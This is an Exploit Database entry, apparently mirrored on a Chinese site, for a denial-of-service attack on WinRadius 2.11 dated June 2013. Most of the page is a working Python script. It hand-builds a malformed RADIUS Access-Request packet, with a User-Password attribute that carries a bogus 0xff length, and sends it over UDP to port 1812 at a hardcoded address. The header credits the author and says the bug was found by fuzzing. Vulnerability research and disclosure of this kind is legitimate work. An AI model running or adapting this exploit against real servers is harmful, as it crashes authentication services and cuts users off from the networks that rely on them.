WinRadius 2.11 – Denial of Service

• Exploit Database
• 12 阅读

• 作者： npn
  日期： 2013-06-11
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/26130/

• #!/usr/bin/python
  
  
  #Exploit Title: WinRadius 2.11 DoS
  #Date: 10th June 2013
  #Exploit Author: npn
  #Exploit Author Homepage: http://www.iodigitalsec.com/
  #Exploit Author Write Up: http://www.iodigitalsec.com/blog/fuzz-to-denial-of-service-winradius-2-11/
  #Vendor Homepage: [ADVERT HOLDING PAGE] http://www.itconsult2000.com/
  #Software Link: http://download.cnet.com/WinRadius/3000-2085_4-10131429.html
  #Version: 2.2
  #Tested on: Windows XP SP3 English
  #Exploit-DB Note: Read author's write-up
  
  from socket import *
  import sys
  import select
  
  pwn ="\x01" #Code 01
  pwn += "\xff" #packet identifier
  pwn += "\x00\x2c" #len 44
  pwn += "\xd1\x56\x8a\x38\xfb\xea\x4a\x40\xb7\x8a\xa2\x7a\x8f\x3e\xae\x23" #authenticator
  pwn += "\x01" #t=User-Name(1)
  pwn += "\x06" #avp: l=6
  pwn += "\x61\x64\x61\x6d" #adam
  
  pwn += "\x02" #avp t=User-Password(2)
  pwn += "\xff" #avp: l=18 
  pwn += "\xf0\x13\x57\x7e\x48\x1e\x55\xaa\x7d\x29\x6d\x7a\x88\x18\x89\x21" #password (enc)
  
  address = ('192.168.200.20', 1812)
  server_socket = socket(AF_INET, SOCK_DGRAM)
  
  server_socket.sendto(pwn, address)